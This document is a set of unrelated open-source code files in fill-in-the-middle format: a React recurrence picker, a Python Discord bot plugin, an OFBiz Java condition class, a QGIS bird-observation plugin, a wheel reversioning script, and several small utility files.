newValidations; iceCubeHash["until"] = until; this.props.onSave(JSON.stringify(iceCubeHash)); }, render: function() { return ( React.createElement("div", {className: "recurring-select"}, React.createElement(Tabs, null, React.createElement(Tabs.Panel, {title: "Recurrence Rule"}, React.createElement(RulePicker, { rule: this.state.rule, interval: this.state.interval, validations: this.state.validations, onRuleChange: this.handleRuleChange, onIntervalChange: this.handleIntervalChange, onValidationsChange: this.handleValidationsChange}) ), React.createElement(Tabs.Panel, {title: "Occurence Time"}, React.createElement(TimePicker, {value: this.state.startTime, onChange: this.handleTimeChange}) ), React.createElement(Tabs.Panel, {title: "Recurring Until"}, React.createElement(DatePicker, {minDate: moment().format("YYYY-MM-DD"), date: this.state.until, onChange: this.handleEndDateChange}) ) ), React.createElement("hr", null), React.createElement(RuleSummary, {fields: this.state}), React.createElement("button", {className: "btn save", onClick: this.handleSave}, "Save") ) ); } }); module.exports = RecurringSelect;<|fim▁end|>
<|file_name|>misc.py<|end_file_name|><|fim▁begin|>import random import re from io import BytesIO from typing import Awaitable, List import matplotlib.pyplot as plt import seaborn as sns from curio.thread import async_thread from curious.commands import Context, Plugin from curious.commands.decorators import autoplugin, ratelimit from yapf.yapflib.style import CreatePEP8Style from yapf.yapflib.yapf_api import FormatCode from jokusoramame.utils import rgbize code_regexp = re.compile(r"```([^\n]+)\n?(.+)\n?```", re.DOTALL) ADJECTIVES = { "Trans-Exclusionary ": 1, "Smithian ": 2, "Ricardian ": 2, "Randian ": 3, "Hegelian ": 3, "Synthesist ": 3, "Woke ": 4, "Vegan ": 4, "Green ": 6, "Insurrectionary ": 6, "Anti-Imperialist ": 6, "Jewish ": 8, "Bolshevik ": 8, "Post-left ": 8, "Inclusive ": 9, "Individualist ": 9, "Queer ": 10, "Atheist ": 10, "Liberal ": 10, "Libertarian ": 10, "Conservative ": 10, "Social ": 12, "Islamic ": 12, "Radical ": 12, "Catholic ": 12, "Esoteric ": 12, "Christian ": 12, "Progressive ": 12, "Post-Colonial ": 12, "Democratic ": 13, "": 30 } PREFIXES = { "Alt-": 1, "Bio-": 1, "Taoist ": 2, "Left ": 3, "Post-": 3, "Anarcha-": 3, "Avant Garde ": 3, "Eco-": 4, "Communal ": 6, "Afro-": 8, "Ethno-": 8, "Ultra-": 8, "Neo-": 10, "Pan-": 10, "Anti-": 10, "Paleo-": 10, "Techno-": 10, "Market ": 10, "Revolutionary ": 10, "Crypto-": 12, "Anarcho-": 12, "National ": 12, "Orthodox ": 12, "": 40 } IDEOLOGIES = { "Posadism": 1, "Sexualism": 1, "Kemalism": 2, "Unruheism": 2, "Distributism": 2, "Titoism": 3, "Putinism": 3, "Makhnovism": 3, "Georgism": 4, "Keynesian": 4, "Platformism": 4, "Municipalism": 5, "Confederalism": 5, "Egoism": 6, "Luddite": 6, "Agorism": 6, "Unionism": 6, "Thatcherite": 6, "Minarchism": 7, "Ba'athism": 8, "Trotskyism": 8, "Syndicalism": 8, "Luxemburgism": 8, "Strasserism": 10, "Maoism": 12, "Fascism": 12, "Marxism": 12, "Zionism": 12, "Centrism": 12, "Pacifism": 12, "Leninism": 12, "Populism": 12, "Futurism": 12, "Feminism": 12, "Humanism": 12, "Mutualism": 12, "Communism": 12, "Stalinism": 12, "Globalism": 12, "Socialism": 12, "Capitalism": 12, "Monarchism": 12, "Primitivism": 12, "Nationalism": 12, "Transhumanism": 12, "Traditionalism": 12, "Environmentalism": 12, "Accelerationism": 12 } SUFFIXES = { " in One Country": 1, " with Masonic elements": 1, ' with "rational debate"': 1, " with Phlegmsky's vanguardism": 1, " with Chinese characteristics": 1, " with a new mode of production": 1, "": 100 } @autoplugin class Misc(Plugin): """ Miscellaneous commands. """ async def command_ideology(self, ctx: Context): """ Creates an ideology just for you! """ message = '' for d in (ADJECTIVES, PREFIXES, IDEOLOGIES, SUFFIXES): message += random.choices(list(d.keys()), list(d.values()))[0] await ctx.channel.messages.send(message) @ratelimit(limit=1, time=30) async def command_palette(self, ctx: Context, *, colours: List[int]): """ Shows a palette plot. """ pal_colours = rgbize(colours[:12]) @async_thread def plot_palette() -> Awaitable[BytesIO]: with ctx.bot._plot_lock: sns.palplot(pal_colours, size=1) plt.tight_layout() # remove useless padding<|fim▁hole|> plt.savefig(buf, format="png") buf.seek(0) plt.clf() plt.cla() return buf @async_thread() def plot_dark_palette() -> Awaitable[BytesIO]: with ctx.bot._plot_lock: with plt.style.context("dark_background"): sns.palplot(pal_colours, size=1) plt.tight_layout() # remove useless padding buf = BytesIO() plt.savefig(buf, format="png") buf.seek(0) plt.clf() plt.cla() return buf if ctx.bot._plot_lock.locked(): await ctx.channel.messages.send("Waiting for plot lock...") async with ctx.channel.typing: buf = await plot_palette() buf2 = await plot_dark_palette() await ctx.channel.messages.upload(fp=buf.read(), filename="plot.png") await ctx.channel.messages.upload(fp=buf2, filename="plot_dark.png") def _normalize_language(self, lang: str) -> str: """ Normalizes a language name into consistency. """ lang = lang.lower().rstrip("\n") print(repr(lang)) if lang in ["py", "python", "py3k"]: return "python" return lang async def command_reformat(self, ctx: Context, *, message: str): """ Reformats some code. """ code_match = code_regexp.match(message) if code_match is None: return await ctx.channel.messages.send(":x: Could not find a valid code block with " "language.") language, code = code_match.groups() code = code.replace("\t", " ") language = self._normalize_language(language) if language == "python": # yapfify style = CreatePEP8Style() style['COLUMN_LIMIT'] = 100 reformatted, changes = FormatCode(code, style_config=style) return await ctx.channel.messages.send(f"```py\n{reformatted}```") return await ctx.channel.messages.send(":x: Unknown language.")<|fim▁end|>
buf = BytesIO()
<|file_name|>ModelTreeCondition.java<|end_file_name|><|fim▁begin|>/******************************************************************************* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. *******************************************************************************/ package org.ofbiz.widget.tree; import java.lang.reflect.Method; import java.util.ArrayList; import java.util.LinkedList; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.TimeZone; import org.apache.oro.text.regex.MalformedPatternException; import org.apache.oro.text.regex.Pattern; import org.apache.oro.text.regex.PatternMatcher; import org.apache.oro.text.regex.Perl5Matcher; import org.ofbiz.base.util.Debug; import org.ofbiz.base.util.GeneralException; import org.ofbiz.base.util.ObjectType; import org.ofbiz.base.util.PatternFactory; import org.ofbiz.base.util.UtilValidate; import org.ofbiz.base.util.UtilXml; import org.ofbiz.base.util.collections.FlexibleMapAccessor; import org.ofbiz.base.util.string.FlexibleStringExpander; import org.ofbiz.entity.GenericValue; import org.ofbiz.entityext.permission.EntityPermissionChecker; import org.ofbiz.minilang.operation.BaseCompare; import org.ofbiz.security.Security; import org.w3c.dom.Element; /** * Widget Library - Screen model condition class */ public class ModelTreeCondition { public static final String module = ModelTreeCondition.class.getName(); protected ModelTree modelTree; protected TreeCondition rootCondition; public ModelTreeCondition(ModelTree modelTree, Element conditionElement) { this.modelTree = modelTree; Element firstChildElement = UtilXml.firstChildElement(conditionElement); this.rootCondition = readCondition(modelTree, firstChildElement); } public boolean eval(Map<String, ? extends Object> context) { if (rootCondition == null) { return true; } return rootCondition.eval(context); } public static abstract class TreeCondition { protected ModelTree modelTree; public TreeCondition(ModelTree modelTree, Element conditionElement) { this.modelTree = modelTree; } public abstract boolean eval(Map<String, ? extends Object> context); } public static List<TreeCondition> readSubConditions(ModelTree modelTree, Element conditionElement) { List<TreeCondition> condList = new ArrayList<TreeCondition>(); for (Element subElement: UtilXml.childElementList(conditionElement)) { condList.add(readCondition(modelTree, subElement)); } return condList; } public static TreeCondition readCondition(ModelTree modelTree, Element conditionElement) { if (conditionElement == null) { return null; } if ("and".equals(conditionElement.getNodeName())) { return new And(modelTree, conditionElement); } else if ("xor".equals(conditionElement.getNodeName())) { return new Xor(modelTree, conditionElement); } else if ("or".equals(conditionElement.getNodeName())) { return new Or(modelTree, conditionElement); } else if ("not".equals(conditionElement.getNodeName())) { return new Not(modelTree, conditionElement); } else if ("if-has-permission".equals(conditionElement.getNodeName())) { return new IfHasPermission(modelTree, conditionElement); } else if ("if-validate-method".equals(conditionElement.getNodeName())) { return new IfValidateMethod(modelTree, conditionElement); } else if ("if-compare".equals(conditionElement.getNodeName())) { return new IfCompare(modelTree, conditionElement); } else if ("if-compare-field".equals(conditionElement.getNodeName())) { return new IfCompareField(modelTree, conditionElement); } else if ("if-regexp".equals(conditionElement.getNodeName())) { return new IfRegexp(modelTree, conditionElement); } else if ("if-empty".equals(conditionElement.getNodeName())) { return new IfEmpty(modelTree, conditionElement); } else if ("if-entity-permission".equals(conditionElement.getNodeName())) { return new IfEntityPermission(modelTree, conditionElement); } else { throw new IllegalArgumentException("Condition element not supported with name: " + conditionElement.getNodeName()); } } public static class And extends TreeCondition { protected List<? extends TreeCondition> subConditions; public And(ModelTree modelTree, Element condElement) { super (modelTree, condElement); this.subConditions = readSubConditions(modelTree, condElement); } @Override public boolean eval(Map<String, ? extends Object> context) { // return false for the first one in the list that is false, basic and algo for (TreeCondition subCondition: subConditions) { if (!subCondition.eval(context)) { return false; } } return true; } } public static class Xor extends TreeCondition { protected List<? extends TreeCondition> subConditions; public Xor(ModelTree modelTree, Element condElement) { super (modelTree, condElement); this.subConditions = readSubConditions(modelTree, condElement); } @Override public boolean eval(Map<String, ? extends Object> context) { // if more than one is true stop immediately and return false; if all are false return false; if only one is true return true boolean foundOneTrue = false; for (TreeCondition subCondition: subConditions) { if (subCondition.eval(context)) { if (foundOneTrue) { // now found two true, so return false return false; } else { foundOneTrue = true; } } } return foundOneTrue; }<|fim▁hole|> public static class Or extends TreeCondition { protected List<? extends TreeCondition> subConditions; public Or(ModelTree modelTree, Element condElement) { super (modelTree, condElement); this.subConditions = readSubConditions(modelTree, condElement); } @Override public boolean eval(Map<String, ? extends Object> context) { // return true for the first one in the list that is true, basic or algo for (TreeCondition subCondition: subConditions) { if (subCondition.eval(context)) { return true; } } return false; } } public static class Not extends TreeCondition { protected TreeCondition subCondition; public Not(ModelTree modelTree, Element condElement) { super (modelTree, condElement); Element firstChildElement = UtilXml.firstChildElement(condElement); this.subCondition = readCondition(modelTree, firstChildElement); } @Override public boolean eval(Map<String, ? extends Object> context) { return !this.subCondition.eval(context); } } public static class IfHasPermission extends TreeCondition { protected FlexibleStringExpander permissionExdr; protected FlexibleStringExpander actionExdr; public IfHasPermission(ModelTree modelTree, Element condElement) { super (modelTree, condElement); this.permissionExdr = FlexibleStringExpander.getInstance(condElement.getAttribute("permission")); this.actionExdr = FlexibleStringExpander.getInstance(condElement.getAttribute("action")); } @Override public boolean eval(Map<String, ? extends Object> context) { // if no user is logged in, treat as if the user does not have permission GenericValue userLogin = (GenericValue) context.get("userLogin"); if (userLogin != null) { String permission = permissionExdr.expandString(context); String action = actionExdr.expandString(context); Security security = (Security) context.get("security"); if (UtilValidate.isNotEmpty(action)) { // run hasEntityPermission if (security.hasEntityPermission(permission, action, userLogin)) { return true; } } else { // run hasPermission if (security.hasPermission(permission, userLogin)) { return true; } } } return false; } } public static class IfValidateMethod extends TreeCondition { protected FlexibleMapAccessor<Object> fieldAcsr; protected FlexibleStringExpander methodExdr; protected FlexibleStringExpander classExdr; public IfValidateMethod(ModelTree modelTree, Element condElement) { super (modelTree, condElement); this.fieldAcsr = FlexibleMapAccessor.getInstance(condElement.getAttribute("field")); if (this.fieldAcsr.isEmpty()) this.fieldAcsr = FlexibleMapAccessor.getInstance(condElement.getAttribute("field-name")); this.methodExdr = FlexibleStringExpander.getInstance(condElement.getAttribute("method")); this.classExdr = FlexibleStringExpander.getInstance(condElement.getAttribute("class")); } @Override public boolean eval(Map<String, ? extends Object> context) { String methodName = this.methodExdr.expandString(context); String className = this.classExdr.expandString(context); Object fieldVal = this.fieldAcsr.get(context); String fieldString = null; if (fieldVal != null) { try { fieldString = (String) ObjectType.simpleTypeConvert(fieldVal, "String", null, (TimeZone) context.get("timeZone"), (Locale) context.get("locale"), true); } catch (GeneralException e) { Debug.logError(e, "Could not convert object to String, using empty String", module); } } // always use an empty string by default if (fieldString == null) fieldString = ""; Class<?>[] paramTypes = new Class[] {String.class}; Object[] params = new Object[] {fieldString}; Class<?> valClass; try { valClass = ObjectType.loadClass(className); } catch (ClassNotFoundException cnfe) { Debug.logError("Could not find validation class: " + className, module); return false; } Method valMethod; try { valMethod = valClass.getMethod(methodName, paramTypes); } catch (NoSuchMethodException cnfe) { Debug.logError("Could not find validation method: " + methodName + " of class " + className, module); return false; } Boolean resultBool = Boolean.FALSE; try { resultBool = (Boolean) valMethod.invoke(null, params); } catch (Exception e) { Debug.logError(e, "Error in IfValidationMethod " + methodName + " of class " + className + ", defaulting to false ", module); } return resultBool.booleanValue(); } } public static class IfCompare extends TreeCondition { protected FlexibleMapAccessor<Object> fieldAcsr; protected FlexibleStringExpander valueExdr; protected String operator; protected String type; protected FlexibleStringExpander formatExdr; public IfCompare(ModelTree modelTree, Element condElement) { super (modelTree, condElement); this.fieldAcsr = FlexibleMapAccessor.getInstance(condElement.getAttribute("field")); if (this.fieldAcsr.isEmpty()) this.fieldAcsr = FlexibleMapAccessor.getInstance(condElement.getAttribute("field-name")); this.valueExdr = FlexibleStringExpander.getInstance(condElement.getAttribute("value")); this.operator = condElement.getAttribute("operator"); this.type = condElement.getAttribute("type"); this.formatExdr = FlexibleStringExpander.getInstance(condElement.getAttribute("format")); } @Override public boolean eval(Map<String, ? extends Object> context) { String value = this.valueExdr.expandString(context); String format = this.formatExdr.expandString(context); Object fieldVal = this.fieldAcsr.get(context); // always use an empty string by default if (fieldVal == null) { fieldVal = ""; } List<Object> messages = new LinkedList<Object>(); Boolean resultBool = BaseCompare.doRealCompare(fieldVal, value, operator, type, format, messages, null, null, true); if (messages.size() > 0) { messages.add(0, "Error with comparison in if-compare between field [" + fieldAcsr.toString() + "] with value [" + fieldVal + "] and value [" + value + "] with operator [" + operator + "] and type [" + type + "]: "); StringBuilder fullString = new StringBuilder(); for (Object message: messages) { fullString.append((String) message); } Debug.logWarning(fullString.toString(), module); throw new IllegalArgumentException(fullString.toString()); } return resultBool.booleanValue(); } } public static class IfCompareField extends TreeCondition { protected FlexibleMapAccessor<Object> fieldAcsr; protected FlexibleMapAccessor<Object> toFieldAcsr; protected String operator; protected String type; protected FlexibleStringExpander formatExdr; public IfCompareField(ModelTree modelTree, Element condElement) { super (modelTree, condElement); this.fieldAcsr = FlexibleMapAccessor.getInstance(condElement.getAttribute("field")); if (this.fieldAcsr.isEmpty()) this.fieldAcsr = FlexibleMapAccessor.getInstance(condElement.getAttribute("field-name")); this.toFieldAcsr = FlexibleMapAccessor.getInstance(condElement.getAttribute("to-field")); if (this.toFieldAcsr.isEmpty()) this.toFieldAcsr = FlexibleMapAccessor.getInstance(condElement.getAttribute("to-field-name")); this.operator = condElement.getAttribute("operator"); this.type = condElement.getAttribute("type"); this.formatExdr = FlexibleStringExpander.getInstance(condElement.getAttribute("format")); } @Override public boolean eval(Map<String, ? extends Object> context) { String format = this.formatExdr.expandString(context); Object fieldVal = this.fieldAcsr.get(context); Object toFieldVal = this.toFieldAcsr.get(context); // always use an empty string by default if (fieldVal == null) { fieldVal = ""; } List<Object> messages = new LinkedList<Object>(); Boolean resultBool = BaseCompare.doRealCompare(fieldVal, toFieldVal, operator, type, format, messages, null, null, false); if (messages.size() > 0) { messages.add(0, "Error with comparison in if-compare-field between field [" + fieldAcsr.toString() + "] with value [" + fieldVal + "] and to-field [" + toFieldVal.toString() + "] with value [" + toFieldVal + "] with operator [" + operator + "] and type [" + type + "]: "); StringBuilder fullString = new StringBuilder(); for (Object message: messages) { fullString.append((String) message); } Debug.logWarning(fullString.toString(), module); throw new IllegalArgumentException(fullString.toString()); } return resultBool.booleanValue(); } } public static class IfRegexp extends TreeCondition { protected FlexibleMapAccessor<Object> fieldAcsr; protected FlexibleStringExpander exprExdr; public IfRegexp(ModelTree modelTree, Element condElement) { super (modelTree, condElement); this.fieldAcsr = FlexibleMapAccessor.getInstance(condElement.getAttribute("field")); if (this.fieldAcsr.isEmpty()) this.fieldAcsr = FlexibleMapAccessor.getInstance(condElement.getAttribute("field-name")); this.exprExdr = FlexibleStringExpander.getInstance(condElement.getAttribute("expr")); } @Override public boolean eval(Map<String, ? extends Object> context) { Object fieldVal = this.fieldAcsr.get(context); String expr = this.exprExdr.expandString(context); Pattern pattern = null; try { pattern = PatternFactory.createOrGetPerl5CompiledPattern(expr, true); } catch (MalformedPatternException e) { String errMsg = "Error in evaluation in if-regexp in screen: " + e.toString(); Debug.logError(e, errMsg, module); throw new IllegalArgumentException(errMsg); } String fieldString = null; try { fieldString = (String) ObjectType.simpleTypeConvert(fieldVal, "String", null, (TimeZone) context.get("timeZone"), (Locale) context.get("locale"), true); } catch (GeneralException e) { Debug.logError(e, "Could not convert object to String, using empty String", module); } // always use an empty string by default if (fieldString == null) fieldString = ""; PatternMatcher matcher = new Perl5Matcher(); return matcher.matches(fieldString, pattern); } } public static class IfEmpty extends TreeCondition { protected FlexibleMapAccessor<Object> fieldAcsr; public IfEmpty(ModelTree modelTree, Element condElement) { super (modelTree, condElement); this.fieldAcsr = FlexibleMapAccessor.getInstance(condElement.getAttribute("field")); if (this.fieldAcsr.isEmpty()) this.fieldAcsr = FlexibleMapAccessor.getInstance(condElement.getAttribute("field-name")); } @Override public boolean eval(Map<String, ? extends Object> context) { Object fieldVal = this.fieldAcsr.get(context); return ObjectType.isEmpty(fieldVal); } } public static class IfEntityPermission extends TreeCondition { protected EntityPermissionChecker permissionChecker; public IfEntityPermission(ModelTree modelTree, Element condElement) { super (modelTree, condElement); this.permissionChecker = new EntityPermissionChecker(condElement); } @Override public boolean eval(Map<String, ? extends Object> context) { boolean passed = permissionChecker.runPermissionCheck(context); return passed; } } }<|fim▁end|>
}
<|file_name|>types.ts<|end_file_name|><|fim▁begin|>/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ <|fim▁hole|>export interface TextStyle { font?: string; fontFamily?: string; fontSize?: string | number; fontStyle?: string; fontWeight?: string | number; letterSpacing?: string | number; } export interface Margin { top: number; left: number; bottom: number; right: number; } export interface Dimension { width: number; height: number; } export default {};<|fim▁end|>
<|file_name|>prime_test.py<|end_file_name|><|fim▁begin|>""" prime_test(n) returns a True if n is a prime number else it returns False """ import unittest def prime_test(n): if n <= 1: return False if n == 2 or n == 3: return True if n % 2 == 0 or n % 3 == 0: return False j = 5 while j * j <= n: if n % j == 0 or n % (j + 2) == 0: return False j += 6 return True def prime_test2(n): # prime numbers are greater than 1 if n > 1: # check for factors for i in range(2, int(n ** 0.5) + 1): if (n % i) == 0: # print(num, "is not a prime number") # print(i, "times", num//i, "is", num) return False # print(num, "is a prime number") return True # if input number is less than # or equal to 1, it is not prime else: return False class TestSuite(unittest.TestCase): def test_prime_test(self): """ checks all prime numbers between 2 up to 100. Between 2 up to 100 exists 25 prime numbers! """ counter = 0 for i in range(2, 101): if prime_test(i): counter += 1 self.assertEqual(25, counter) def test_prime_test2(self): """ checks all prime numbers between 2 up to 100. Between 2 up to 100 exists 25 prime numbers! """ counter = 0 for i in range(2, 101): if prime_test(i): counter += 1<|fim▁hole|> self.assertEqual(25, counter) if __name__ == "__main__": unittest.main()<|fim▁end|>
<|file_name|>SucursalesAltaRequest.java<|end_file_name|><|fim▁begin|>package mx.emite.sdk.scot.request; import java.util.List; import javax.validation.Valid; import javax.validation.constraints.NotNull; import org.hibernate.validator.constraints.NotEmpty; import lombok.Builder; import lombok.Data; import lombok.Singular; import mx.emite.sdk.cfdi32.anotaciones.Rfc; import mx.emite.sdk.scot.request.extra.SucursalInfo; @Data @Builder public class SucursalesAltaRequest { /**<|fim▁hole|> * @param token * Token del <b>Integrador</b> obtenido de Scot&copy; * */ @NotNull private String token; /** * @param rfc del emisor, si se deja en blanco se consultan todos los emisores */ @Rfc private String rfc; /** * @param sucursales lista de sucursales a dar de alta */ @Valid @NotEmpty @Singular("sucursal") private List<SucursalInfo> sucursales; /** * modificar si la sucursal ya se encuentra dado de alta */ @NotNull public Boolean modificar; }<|fim▁end|>
* Token del <b>Integrador</b> obtenido con el servicio de Token * -- SETTER -- *
<|file_name|>bird_chooser_dialog.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- """ /*************************************************************************** BirdChooserDialog A QGIS plugin Show bird observations ------------------- begin : 2015-11-05 git sha : $Format:%H$ copyright : (C) 2015 by Jerome email : [email protected] ***************************************************************************/ /*************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * ***************************************************************************/ """ import os import psycopg2 from PyQt4 import QtGui, uic from qgis.core import QgsDataSourceURI, QgsVectorLayer, QgsMapLayerRegistry, QgsMarkerSymbolV2, QgsMessageLog FORM_CLASS, _ = uic.loadUiType(os.path.join( os.path.dirname(__file__), 'bird_chooser_dialog_base.ui')) class BirdChooserDialog(QtGui.QDialog, FORM_CLASS): def __init__(self, iface, parent=None): """Constructor.""" super(BirdChooserDialog, self).__init__(parent) # Set up the user interface from Designer. # After setupUI you can access any designer object by doing # self.<objectname>, and you can use autoconnect slots - see # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html # #widgets-and-dialogs-with-auto-connect self.setupUi(self) self.iface = iface # Connecter les slots self._connectSlots() #self.conn = psycopg2.connect(database = "jguelat", user = "jguelat", password = "") self.conn = psycopg2.connect(service = "local_jguelat") def _connectSlots(self): self.tableCombo.activated.connect(self.getSpecies) # Quand la fenetre est fermee (d'une maniere ou d'une autre) self.finished.connect(self.closeConnection) self.addLayerButton.clicked.connect(self.addLayer) def getSpecies(self): self.speciesCombo.clear() cur = self.conn.cursor()<|fim▁hole|> cur.execute("SELECT DISTINCT species_id from " + self.tableCombo.currentText() + " ORDER BY species_id") rows = cur.fetchall() self.speciesCombo.addItems([str(elem[0]) for elem in rows]) self.addLayerButton.setEnabled(True) cur.close() def addLayer(self): uri = QgsDataSourceURI() # set host name, port, database name, username and password #uri.setConnection("localhost", "5432", "jguelat", "jguelat", "") uri.setConnection("local_jguelat", "", "", "") # set database schema, table name, geometry column and optionally subset (WHERE clause) uri.setDataSource("public", self.tableCombo.currentText(), "geom", "species_id = " + self.speciesCombo.currentText()) #vlayer = self.iface.addVectorLayer(uri.uri(), "Species " + self.speciesCombo.currentText(), "postgres") vlayer = QgsVectorLayer(uri.uri(), "Species " + self.speciesCombo.currentText(), "postgres") props = vlayer.rendererV2().symbol().symbolLayer(0).properties() props['size'] = '3' props['color'] = 'blue' vlayer.rendererV2().setSymbol(QgsMarkerSymbolV2.createSimple(props)) QgsMapLayerRegistry.instance().addMapLayer(vlayer) QgsMessageLog.logMessage("Tout est OK", 'BirdChooser', QgsMessageLog.INFO) def closeConnection(self): self.conn.close()<|fim▁end|>
<|file_name|>reversion.py<|end_file_name|><|fim▁begin|># Copyright 2017 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import annotations import argparse import base64 import fnmatch import glob import hashlib import os import re import zipfile from pants.util.contextutil import open_zip, temporary_dir from pants.util.dirutil import read_file, safe_file_dump def replace_in_file(workspace, src_file_path, from_str, to_str): """Replace from_str with to_str in the name and content of the given file. If any edits were necessary, returns the new filename (which may be the same as the old filename). """ from_bytes = from_str.encode("ascii") to_bytes = to_str.encode("ascii") data = read_file(os.path.join(workspace, src_file_path), binary_mode=True) if from_bytes not in data and from_str not in src_file_path: return None dst_file_path = src_file_path.replace(from_str, to_str) safe_file_dump( os.path.join(workspace, dst_file_path), data.replace(from_bytes, to_bytes), mode="wb" ) if src_file_path != dst_file_path: os.unlink(os.path.join(workspace, src_file_path)) return dst_file_path def any_match(globs, filename): return any(fnmatch.fnmatch(filename, g) for g in globs) def locate_dist_info_dir(workspace): dir_suffix = "*.dist-info" matches = glob.glob(os.path.join(workspace, dir_suffix)) if not matches: raise Exception("Unable to locate `{}` directory in input whl.".format(dir_suffix)) if len(matches) > 1: raise Exception("Too many `{}` directories in input whl: {}".format(dir_suffix, matches)) return os.path.relpath(matches[0], workspace) def fingerprint_file(workspace, filename): """Given a relative filename located in a workspace, fingerprint the file. Returns a tuple of fingerprint string and size string. """ content = read_file(os.path.join(workspace, filename), binary_mode=True) fingerprint = hashlib.sha256(content) b64_encoded = base64.b64encode(fingerprint.digest()) return f"sha256={b64_encoded.decode()}", str(len(content)) def rewrite_record_file(workspace, src_record_file, mutated_file_tuples): """Given a RECORD file and list of mutated file tuples, update the RECORD file in place. The RECORD file should always be a member of the mutated files, due to both containing versions, and having a version in its filename. """ mutated_files = set() dst_record_file = None for src, dst in mutated_file_tuples: if src == src_record_file: dst_record_file = dst else: mutated_files.add(dst) if not dst_record_file: raise Exception( "Malformed whl or bad globs: `{}` was not rewritten.".format(src_record_file) ) output_records = [] file_name = os.path.join(workspace, dst_record_file) for line in read_file(file_name).splitlines(): filename, fingerprint_str, size_str = line.rsplit(",", 3) if filename in mutated_files: fingerprint_str, size_str = fingerprint_file(workspace, filename) output_line = ",".join((filename, fingerprint_str, size_str)) else: output_line = line output_records.append(output_line) safe_file_dump(file_name, "\r\n".join(output_records) + "\r\n") # The wheel METADATA file will contain a line like: `Version: 1.11.0.dev3+7951ec01`. # We don't parse the entire file because it's large (it contains the entire release notes history). _version_re = re.compile(r"Version: (?P<version>\S+)") def reversion( *, whl_file: str, dest_dir: str, target_version: str, extra_globs: list[str] | None = None ) -> None: all_globs = ["*.dist-info/*", "*-nspkg.pth", *(extra_globs or ())] with temporary_dir() as workspace: # Extract the input. with open_zip(whl_file, "r") as whl: src_filenames = whl.namelist() whl.extractall(workspace) # Determine the location of the `dist-info` directory. dist_info_dir = locate_dist_info_dir(workspace) record_file = os.path.join(dist_info_dir, "RECORD") # Get version from the input whl's metadata. input_version = None metadata_file = os.path.join(workspace, dist_info_dir, "METADATA") with open(metadata_file, "r") as info: for line in info: mo = _version_re.match(line) if mo: input_version = mo.group("version") break if not input_version: raise Exception("Could not find `Version:` line in {}".format(metadata_file)) # Rewrite and move all files (including the RECORD file), recording which files need to be # re-fingerprinted due to content changes. dst_filenames = [] refingerprint = [] for src_filename in src_filenames: if os.path.isdir(os.path.join(workspace, src_filename)): continue dst_filename = src_filename if any_match(all_globs, src_filename): rewritten = replace_in_file(workspace, src_filename, input_version, target_version) if rewritten is not None: dst_filename = rewritten refingerprint.append((src_filename, dst_filename)) dst_filenames.append(dst_filename) # Refingerprint relevant entries in the RECORD file under their new names. rewrite_record_file(workspace, record_file, refingerprint) # Create a new output whl in the destination. dst_whl_filename = os.path.basename(whl_file).replace(input_version, target_version) dst_whl_file = os.path.join(dest_dir, dst_whl_filename) with open_zip(dst_whl_file, "w", zipfile.ZIP_DEFLATED) as whl: for dst_filename in dst_filenames: whl.write(os.path.join(workspace, dst_filename), dst_filename) print("Wrote whl with version {} to {}.\n".format(target_version, dst_whl_file)) def create_parser() -> argparse.ArgumentParser: parser = argparse.ArgumentParser() parser.add_argument("whl_file", help="The input whl file.") parser.add_argument("dest_dir", help="The destination directory for the output whl.") parser.add_argument("target_version", help="The target version of the output whl.") parser.add_argument( "--extra-globs", action="append", default=[], help="Extra globs (fnmatch) to rewrite within the whl: may be specified multiple times.", ) return parser def main(): """Given an input whl file and target version, create a copy of the whl with that version. This is accomplished via string replacement in files matching a list of globs. Pass the optional `--glob` argument to add additional globs: ie `--glob='thing-to-match*.txt'`. """ args = create_parser().parse_args() reversion( whl_file=args.whl_file, dest_dir=args.dest_dir, target_version=args.target_version, extra_globs=args.extra_globs, ) <|fim▁hole|><|fim▁end|>
if __name__ == "__main__": main()
<|file_name|>RendererTextureDesc.cpp<|end_file_name|><|fim▁begin|>// This code contains NVIDIA Confidential Information and is disclosed to you // under a form of NVIDIA software license agreement provided separately to you. // // Notice // NVIDIA Corporation and its licensors retain all intellectual property and // proprietary rights in and to this software and related documentation and // any modifications thereto. Any use, reproduction, disclosure, or // distribution of this software and related documentation without an express // license agreement from NVIDIA Corporation is strictly prohibited. // // ALL NVIDIA DESIGN SPECIFICATIONS, CODE ARE PROVIDED "AS IS.". NVIDIA MAKES // NO WARRANTIES, EXPRESSED, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO // THE MATERIALS, AND EXPRESSLY DISCLAIMS ALL IMPLIED WARRANTIES OF NONINFRINGEMENT, // MERCHANTABILITY, AND FITNESS FOR A PARTICULAR PURPOSE. // // Information and code furnished is believed to be accurate and reliable. // However, NVIDIA Corporation assumes no responsibility for the consequences of use of such // information or for any infringement of patents or other rights of third parties that may // result from its use. No license is granted by implication or otherwise under any patent // or patent rights of NVIDIA Corporation. Details are subject to change without notice. // This code supersedes and replaces all information previously supplied. // NVIDIA Corporation products are not authorized for use as critical // components in life support devices or systems without express written approval of // NVIDIA Corporation. // // Copyright (c) 2008-2013 NVIDIA Corporation. All rights reserved. #include <RendererTextureDesc.h> using namespace SampleRenderer; 